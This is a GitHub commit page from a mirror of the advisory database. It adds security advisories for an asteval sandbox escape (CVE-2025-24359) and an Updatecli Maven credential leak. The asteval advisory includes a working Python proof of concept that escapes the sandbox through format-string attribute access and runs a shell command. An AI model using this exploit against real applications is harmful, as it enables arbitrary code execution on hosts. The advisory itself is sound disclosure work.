github
/
advisory-database
зеркало из https://github.com/github/advisory-database.git
1
0
Форкнуть 0
Код Задачи Пакеты Проекты Релизы Вики Активность

Publish Advisories 

GHSA-3wwr-3g9f-9gc7
GHSA-v34r-vj4r-38j6
GHSA-vqf5-2xx6-9wfm
This commit is contained in:
advisory-database[bot] 2025-01-24 18:46:23 +00:00
Родитель ba66d77a9c
Коммит e1a28f92dd
3 изменённых файлов: 250 добавлений и 0 удалений
Показать статистику Скачать Patch файл Скачать Diff файл Показать все файлы Свернуть все файлы

77
advisories/github-reviewed/2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json Normal file
Просмотреть файл

@ -0,0 +1,77 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3wwr-3g9f-9gc7",
"modified": "2025-01-24T18:45:30Z",
"published": "2025-01-24T18:45:30Z",
"aliases": [
"CVE-2025-24359"
],
"summary": "ASTEVAL Allows Maliciously Crafted Format Strings Lead to Sandbox Escape",
"details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')\n \"formatting used in f-strings\"\n val = self.run(node.value)\n fstring_converters = {115: str, 114: repr, 97: ascii}\n if node.conversion in fstring_converters:\n val = fstring_converters[node.conversion](val)\n fmt = '{__fstring__}'\n if node.format_spec is not None:\n fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'\n return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n# ga\n \ndef pwn():\n try:\n f\"{dict.mro()[1]:'\\\\x7B__fstring__.__getattribute__.s\\\\x7D'}\"\n except Exception as ga:\n ga = ga.obj\n sub = ga(dict.mro()[1],\"__subclasses__\")()\n importer = None\n for i in sub:\n if \"BuiltinImporter\" in str(i):\n importer = i.load_module\n break\n os = importer(\"os\")\n os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n \npwn()\n\"\"\"\naeval(code)\n\n```",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "asteval"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.6"
}
]
}
],
"database_specific": {
"last_known_affected_version_range": "<= 1.0.5"
}
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/lmfit/asteval"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
},
{
"type": "WEB",
"url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
}
],
"database_specific": {
"cwe_ids": [
"CWE-134",
"CWE-749"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2025-01-24T18:45:30Z",
"nvd_published_at": "2025-01-24T17:15:16Z"
}
}

69
advisories/github-reviewed/2025/01/GHSA-v34r-vj4r-38j6/GHSA-v34r-vj4r-38j6.json Normal file
Просмотреть файл

@ -0,0 +1,69 @@
{
"schema_version": "1.4.0",
"id": "GHSA-v34r-vj4r-38j6",
"modified": "2025-01-24T18:45:21Z",
"published": "2025-01-24T18:45:20Z",
"aliases": [
"CVE-2025-24355"
],
"summary": "Updatecli exposes Maven credentials in console output",
"details": "### Summary\n\nPrivate maven repository credentials leaked in application logs in case of unsuccessful retrieval operation.\n\n### Details\n\nDuring the execution of an updatecli pipeline which contains a `maven` source configured with basic auth credentials, the credentials are being leaked in the application execution logs in case of failure.\n\nCredentials are properly sanitized when the operation is successful but not when for whatever reason there is a failure in the maven repository .e.g. wrong coordinates provided, not existing artifact or version.\n\n### PoC\n\nThe [documentation](https://www.updatecli.io/docs/plugins/resource/maven/) currently state to provide user credentials as basic auth inside the `repository` field. e.g.\n\n```\nsources:\n default:\n kind: maven\n spec:\n repository: \"{{ requiredEnv \"MAVEN_USERNAME\" }}:{{ requiredEnv \"MAVEN_PASS\" }}@repo.example.org/releases\"\n groupid: \"org.example.company\"\n artifactid: \"my-artifact\"\n versionFilter:\n kind: regex\n pattern: \"^23(\\.[0-9]+){1,2}$\"\n```\n\nLogs are sanitized properly in case of a successful operation:\n\n```\nsource: source#default\n-----------------------------------------------------------\nSearching for version matching pattern \"^23(\\\\.[0-9]+){1,2}$\"\n✔ Latest version is 23.4.0 on the Maven repository at https://repo.example.org/releases/org/example/company/my-artifact/maven-metadata.xml\n```\n\nbut leaks credentials in case the GAV coordinates are wrong (misspelled package name or missing):\n\n```\nsource: source#default\n-----------------------------------------------------------\nERROR: ✗ getting latest version: URL \"https://REDACTED:REDACTED@repo.example.org/releases/org/example/company/wrong-artifact/maven-metadata.xml\" not found or in error\n```\n\n### Impact\n\nUser credentials/token used to authenticate against a private maven repository can be leaked in clear-text in console or CI logs.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/updatecli/updatecli"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "0.93.0"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/updatecli/updatecli/security/advisories/GHSA-v34r-vj4r-38j6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24355"
},
{
"type": "WEB",
"url": "https://github.com/updatecli/updatecli/commit/344b28091ffeca5ed32e8d0f9eda542842fcd3fa"
},
{
"type": "PACKAGE",
"url": "https://github.com/updatecli/updatecli"
},
{
"type": "WEB",
"url": "https://www.updatecli.io/docs/plugins/resource/maven"
}
],
"database_specific": {
"cwe_ids": [
"CWE-359"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2025-01-24T18:45:20Z",
"nvd_published_at": "2025-01-24T17:15:16Z"
}
}

104
advisories/github-reviewed/2025/01/GHSA-vqf5-2xx6-9wfm/GHSA-vqf5-2xx6-9wfm.json Normal file
Просмотреть файл

Различия файлов скрыты, потому что одна или несколько строк слишком длинны